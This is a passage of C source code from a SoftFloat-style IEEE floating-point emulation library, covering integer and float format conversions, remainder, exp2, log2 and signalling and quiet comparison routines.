zSig0 | zSig1 ) == 0 ) zExp = 0; } return packFloat128( zSign, zExp, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand formed by the concatenation of `zSig0' and `zSig1', and | returns the proper quadruple-precision floating-point value corresponding | to the abstract input. This routine is just like `roundAndPackFloat128' | except that the input significand has fewer bits and does not have to be | normalized. In all cases, `zExp' must be 1 less than the ``true'' floating- | point exponent. *----------------------------------------------------------------------------*/ static float128 normalizeRoundAndPackFloat128(flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status) { int8_t shiftCount; uint64_t zSig2; if ( zSig0 == 0 ) { zSig0 = zSig1; zSig1 = 0; zExp -= 64; } shiftCount = clz64(zSig0) - 15; if ( 0 <= shiftCount ) { zSig2 = 0; shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); } else { shift128ExtraRightJamming( zSig0, zSig1, 0, - shiftCount, &zSig0, &zSig1, &zSig2 ); } zExp -= shiftCount; return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the 32-bit two's complement integer `a' | to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 int32_to_floatx80(int32_t a, float_status *status) { flag zSign; uint32_t absA; int8_t shiftCount; uint64_t zSig; if ( a == 0 ) return packFloatx80( 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? - a : a; shiftCount = clz32(absA) + 32; zSig = absA; return packFloatx80( zSign, 0x403E - shiftCount, zSig<<shiftCount ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 32-bit two's complement integer `a' to | the quadruple-precision floating-point format. The conversion is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 int32_to_float128(int32_t a, float_status *status) { flag zSign; uint32_t absA; int8_t shiftCount; uint64_t zSig0; if ( a == 0 ) return packFloat128( 0, 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? - a : a; shiftCount = clz32(absA) + 17; zSig0 = absA; return packFloat128( zSign, 0x402E - shiftCount, zSig0<<shiftCount, 0 ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 64-bit two's complement integer `a' | to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 int64_to_floatx80(int64_t a, float_status *status) { flag zSign; uint64_t absA; int8_t shiftCount; if ( a == 0 ) return packFloatx80( 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? - a : a; shiftCount = clz64(absA); return packFloatx80( zSign, 0x403E - shiftCount, absA<<shiftCount ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 64-bit two's complement integer `a' to | the quadruple-precision floating-point format. The conversion is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 int64_to_float128(int64_t a, float_status *status) { flag zSign; uint64_t absA; int8_t shiftCount; int32_t zExp; uint64_t zSig0, zSig1; if ( a == 0 ) return packFloat128( 0, 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? - a : a; shiftCount = clz64(absA) + 49; zExp = 0x406E - shiftCount; if ( 64 <= shiftCount ) { zSig1 = 0; zSig0 = absA; shiftCount -= 64; } else { zSig1 = absA; zSig0 = 0; } shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); return packFloat128( zSign, zExp, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 64-bit unsigned integer `a' | to the quadruple-precision floating-point format. The conversion is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 uint64_to_float128(uint64_t a, float_status *status) { if (a == 0) { return float128_zero; } return normalizeRoundAndPackFloat128(0, 0x406E, 0, a, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the single-precision floating-point value | `a' to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 float32_to_floatx80(float32 a, float_status *status) { flag aSign; int aExp; uint32_t aSig; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0xFF ) { if (aSig) { return commonNaNToFloatx80(float32ToCommonNaN(a, status), status); } return packFloatx80(aSign, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); normalizeFloat32Subnormal( aSig, &aExp, &aSig ); } aSig |= 0x00800000; return packFloatx80( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<40 ); } /*---------------------------------------------------------------------------- | Returns the result of converting the single-precision floating-point value | `a' to the double-precision floating-point format. The conversion is | performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ float128 float32_to_float128(float32 a, float_status *status) { flag aSign; int aExp; uint32_t aSig; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0xFF ) { if (aSig) { return commonNaNToFloat128(float32ToCommonNaN(a, status), status); } return packFloat128( aSign, 0x7FFF, 0, 0 ); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); normalizeFloat32Subnormal( aSig, &aExp, &aSig ); --aExp; } return packFloat128( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<25, 0 ); } /*---------------------------------------------------------------------------- | Returns the remainder of the single-precision floating-point value `a' | with respect to the corresponding value `b'. The operation is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float32 float32_rem(float32 a, float32 b, float_status *status) { flag aSign, zSign; int aExp, bExp, expDiff; uint32_t aSig, bSig; uint32_t q; uint64_t aSig64, bSig64, q64; uint32_t alternateASig; int32_t sigMean; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); bSig = extractFloat32Frac( b ); bExp = extractFloat32Exp( b ); if ( aExp == 0xFF ) { if ( aSig || ( ( bExp == 0xFF ) && bSig ) ) { return propagateFloat32NaN(a, b, status); } float_raise(float_flag_invalid, status); return float32_default_nan(status); } if ( bExp == 0xFF ) { if (bSig) { return propagateFloat32NaN(a, b, status); } return a; } if ( bExp == 0 ) { if ( bSig == 0 ) { float_raise(float_flag_invalid, status); return float32_default_nan(status); } normalizeFloat32Subnormal( bSig, &bExp, &bSig ); } if ( aExp == 0 ) { if ( aSig == 0 ) return a; normalizeFloat32Subnormal( aSig, &aExp, &aSig ); } expDiff = aExp - bExp; aSig |= 0x00800000; bSig |= 0x00800000; if ( expDiff < 32 ) { aSig <<= 8; bSig <<= 8; if ( expDiff < 0 ) { if ( expDiff < -1 ) return a; aSig >>= 1; } q = ( bSig <= aSig ); if ( q ) aSig -= bSig; if ( 0 < expDiff ) { q = ( ( (uint64_t) aSig )<<32 ) / bSig; q >>= 32 - expDiff; bSig >>= 2; aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q; } else { aSig >>= 2; bSig >>= 2; } } else { if ( bSig <= aSig ) aSig -= bSig; aSig64 = ( (uint64_t) aSig )<<40; bSig64 = ( (uint64_t) bSig )<<40; expDiff -= 64; while ( 0 < expDiff ) { q64 = estimateDiv128To64( aSig64, 0, bSig64 ); q64 = ( 2 < q64 ) ? q64 - 2 : 0; #ifdef _MSC_VER aSig64 = 0ULL - ( ( bSig * q64 )<<38 ); #else aSig64 = - ( ( bSig * q64 )<<38 ); #endif expDiff -= 62; } expDiff += 64; q64 = estimateDiv128To64( aSig64, 0, bSig64 ); q64 = ( 2 < q64 ) ? q64 - 2 : 0; q = q64>>( 64 - expDiff ); bSig <<= 6; aSig = ( ( aSig64>>33 )<<( expDiff - 1 ) ) - bSig * q; } do { alternateASig = aSig; ++q; aSig -= bSig; } while ( 0 <= (int32_t) aSig ); sigMean = aSig + alternateASig; if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) { aSig = alternateASig; } zSign = ( (int32_t) aSig < 0 ); #ifdef _MSC_VER if ( zSign ) aSig = 0ULL - aSig; #else if ( zSign ) aSig = - aSig; #endif return normalizeRoundAndPackFloat32(aSign ^ zSign, bExp, aSig, status); } /*---------------------------------------------------------------------------- | Returns the binary exponential of the single-precision floating-point value | `a'. The operation is performed according to the IEC/IEEE Standard for | Binary Floating-Point Arithmetic. | | Uses the following identities: | | 1. ------------------------------------------------------------------------- | x x*ln(2) | 2 = e | | 2. ------------------------------------------------------------------------- | 2 3 4 5 n | x x x x x x x | e = 1 + --- + --- + --- + --- + --- + ... + --- + ... | 1! 2! 3! 4! 5! n! *----------------------------------------------------------------------------*/ static const float64 float32_exp2_coefficients[15] = { const_float64( 0x3ff0000000000000ll ), /* 1 */ const_float64( 0x3fe0000000000000ll ), /* 2 */ const_float64( 0x3fc5555555555555ll ), /* 3 */ const_float64( 0x3fa5555555555555ll ), /* 4 */ const_float64( 0x3f81111111111111ll ), /* 5 */ const_float64( 0x3f56c16c16c16c17ll ), /* 6 */ const_float64( 0x3f2a01a01a01a01all ), /* 7 */ const_float64( 0x3efa01a01a01a01all ), /* 8 */ const_float64( 0x3ec71de3a556c734ll ), /* 9 */ const_float64( 0x3e927e4fb7789f5cll ), /* 10 */ const_float64( 0x3e5ae64567f544e4ll ), /* 11 */ const_float64( 0x3e21eed8eff8d898ll ), /* 12 */ const_float64( 0x3de6124613a86d09ll ), /* 13 */ const_float64( 0x3da93974a8c07c9dll ), /* 14 */ const_float64( 0x3d6ae7f3e733b81fll ), /* 15 */ }; float32 float32_exp2(float32 a, float_status *status) { flag aSign; int aExp; uint32_t aSig; float64 r, x, xn; int i; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0xFF) { if (aSig) { return propagateFloat32NaN(a, float32_zero, status); } return (aSign) ? float32_zero : a; } if (aExp == 0) { if (aSig == 0) return float32_one; } float_raise(float_flag_inexact, status); /* ******************************* */ /* using float64 for approximation */ /* ******************************* */ x = float32_to_float64(a, status); x = float64_mul(x, float64_ln2, status); xn = x; r = float64_one; for (i = 0 ; i < 15 ; i++) { float64 f; f = float64_mul(xn, float32_exp2_coefficients[i], status); r = float64_add(r, f, status); xn = float64_mul(xn, x, status); } return float64_to_float32(r, status); } /*---------------------------------------------------------------------------- | Returns the binary log of the single-precision floating-point value `a'. | The operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float32 float32_log2(float32 a, float_status *status) { flag aSign, zSign; int aExp; uint32_t aSig, zSig, i; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat32( 1, 0xFF, 0 ); normalizeFloat32Subnormal( aSig, &aExp, &aSig ); } if ( aSign ) { float_raise(float_flag_invalid, status); return float32_default_nan(status); } if ( aExp == 0xFF ) { if (aSig) { return propagateFloat32NaN(a, float32_zero, status); } return a; } aExp -= 0x7F; aSig |= 0x00800000; zSign = aExp < 0; zSig = aExp << 23; for (i = 1 << 22; i > 0; i >>= 1) { aSig = ( (uint64_t)aSig * aSig ) >> 23; if ( aSig & 0x01000000 ) { aSig >>= 1; zSig |= i; } } if ( zSign ) #ifdef _MSC_VER zSig = 0 - zSig; #else zSig = -zSig; #endif return normalizeRoundAndPackFloat32(zSign, 0x85, zSig, status); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. Otherwise, the comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_eq(float32 a, float32 b, float_status *status) { uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } av = float32_val(a); bv = float32_val(b); return ( av == bv ) || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than | or equal to the corresponding value `b', and 0 otherwise. The invalid | exception is raised if either operand is a NaN. The comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_le(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. The comparison is performed according | to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_lt(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. The invalid exception is raised if either | operand is a NaN. The comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_unordered(float32 a, float32 b, float_status *status) { a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. The comparison is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_eq_quiet(float32 a, float32 b, float_status *status) { a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } return ( float32_val(a) == float32_val(b) ) || ( (uint32_t) ( ( float32_val(a) | float32_val(b) )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than or | equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not | cause an exception. Otherwise, the comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_le_quiet(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. Otherwise, the comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_lt_quiet(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The | comparison is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_unordered_quiet(float32 a, float32 b, float_status *status) { a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns the result of converting the double-precision floating-point value | `a' to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 float64_to_floatx80(float64 a, float_status *status) { flag aSign; int aExp; uint64_t aSig; a = float64_squash_input_denormal(a, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); if ( aExp == 0x7FF ) { if (aSig) { return commonNaNToFloatx80(float64ToCommonNaN(a, status), status); } return packFloatx80(aSign, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); normalizeFloat64Subnormal( aSig, &aExp, &aSig ); } return packFloatx80( aSign, aExp + 0x3C00, (aSig | UINT64_C(0x0010000000000000)) << 11); } /*---------------------------------------------------------------------------- | Returns the result of converting the double-precision floating-point value | `a' to the quadruple-precision floating-point format. The conversion is | performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ float128 float64_to_float128(float64 a, float_status *status) { flag aSign; int aExp; uint64_t aSig, zSig0, zSig1; a = float64_squash_input_denormal(a, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); if ( aExp == 0x7FF ) { if (aSig) { return commonNaNToFloat128(float64ToCommonNaN(a, status), status); } return packFloat128( aSign, 0x7FFF, 0, 0 ); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); normalizeFloat64Subnormal( aSig, &aExp, &aSig ); --aExp; } shift128Right( aSig, 0, 4, &zSig0, &zSig1 ); return packFloat128( aSign, aExp + 0x3C00, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Returns the remainder of the double-precision floating-point value `a' | with respect to the corresponding value `b'. The operation is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float64 float64_rem(float64 a, float64 b, float_status *status) { flag aSign, zSign; int aExp, bExp, expDiff; uint64_t aSig, bSig; uint64_t q, alternateASig; int64_t sigMean; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); bSig = extractFloat64Frac( b ); bExp = extractFloat64Exp( b ); if ( aExp == 0x7FF ) { if ( aSig || ( ( bExp == 0x7FF ) && bSig ) ) { return propagateFloat64NaN(a, b, status); } float_raise(float_flag_invalid, status); return float64_default_nan(status); } if ( bExp == 0x7FF ) { if (bSig) { return propagateFloat64NaN(a, b, status); } return a; } if ( bExp == 0 ) { if ( bSig == 0 ) { float_raise(float_flag_invalid, status); return float64_default_nan(status); } normalizeFloat64Subnormal( bSig, &bExp, &bSig ); } if ( aExp == 0 ) { if ( aSig == 0 ) return a; normalizeFloat64Subnormal( aSig, &aExp, &aSig ); } expDiff = aExp - bExp; aSig = (aSig | UINT64_C(0x0010000000000000)) << 11; bSig = (bSig | UINT64_C(0x0010000000000000)) << 11; if ( expDiff < 0 ) { if ( expDiff < -1 ) return a; aSig >>= 1; } q = ( bSig <= aSig ); if ( q ) aSig -= bSig; expDiff -= 64; while ( 0 < expDiff ) { q = estimateDiv128To64( aSig, 0, bSig ); q = ( 2 < q ) ? q - 2 : 0; #ifdef _MSC_VER aSig = 0ULL - ( ( bSig>>2 ) * q ); #else aSig = - ( ( bSig>>2 ) * q ); #endif expDiff -= 62; } expDiff += 64; if ( 0 < expDiff ) { q = estimateDiv128To64( aSig, 0, bSig ); q = ( 2 < q ) ? q - 2 : 0; q >>= 64 - expDiff; bSig >>= 2; aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q; } else { aSig >>= 2; bSig >>= 2; } do { alternateASig = aSig; ++q; aSig -= bSig; } while ( 0 <= (int64_t) aSig ); sigMean = aSig + alternateASig; if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) { aSig = alternateASig; } zSign = ( (int64_t) aSig < 0 ); #ifdef _MSC_VER if ( zSign ) aSig = 0 - aSig; #else if ( zSign ) aSig = - aSig; #endif return normalizeRoundAndPackFloat64(aSign ^ zSign, bExp, aSig, status); } /*---------------------------------------------------------------------------- | Returns the binary log of the double-precision floating-point value `a'. | The operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float64 float64_log2(float64 a, float_status *status) { flag aSign, zSign; int aExp; uint64_t aSig, aSig0, aSig1, zSig, i; a = float64_squash_input_denormal(a, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat64( 1, 0x7FF, 0 ); normalizeFloat64Subnormal( aSig, &aExp, &aSig ); } if ( aSign ) { float_raise(float_flag_invalid, status); return float64_default_nan(status); } if ( aExp == 0x7FF ) { if (aSig) { return propagateFloat64NaN(a, float64_zero, status); } return a; } aExp -= 0x3FF; aSig |= UINT64_C(0x0010000000000000); zSign = aExp < 0; zSig = (uint64_t)aExp << 52; for (i = 1LL << 51; i > 0; i >>= 1) { mul64To128( aSig, aSig, &aSig0, &aSig1 ); aSig = ( aSig0 << 12 ) | ( aSig1 >> 52 ); if ( aSig & UINT64_C(0x0020000000000000) ) { aSig >>= 1; zSig |= i; } } if ( zSign ) #ifdef _MSC_VER zSig = 0 - zSig; #else zSig = -zSig; #endif return normalizeRoundAndPackFloat64(zSign, 0x408, zSig, status); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is equal to the | corresponding value `b', and 0 otherwise. The invalid exception is raised | if either operand is a NaN. Otherwise, the comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_eq(float64 a, float64 b, float_status *status) { uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } av = float64_val(a); bv = float64_val(b); return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than or | equal to the corresponding value `b', and 0 otherwise. The invalid | exception is raised if either operand is a NaN. The comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_le(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. The comparison is performed according | to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_lt(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. The invalid exception is raised if either | operand is a NaN. The comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_unordered(float64 a, float64 b, float_status *status) { a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is equal to the | corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception.The comparison is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_eq_quiet(float64 a, float64 b, float_status *status) { uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } av = float64_val(a); bv = float64_val(b); return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than or | equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not | cause an exception. Otherwise, the comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_le_quiet(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. Otherwise, the comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_lt_quiet(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( 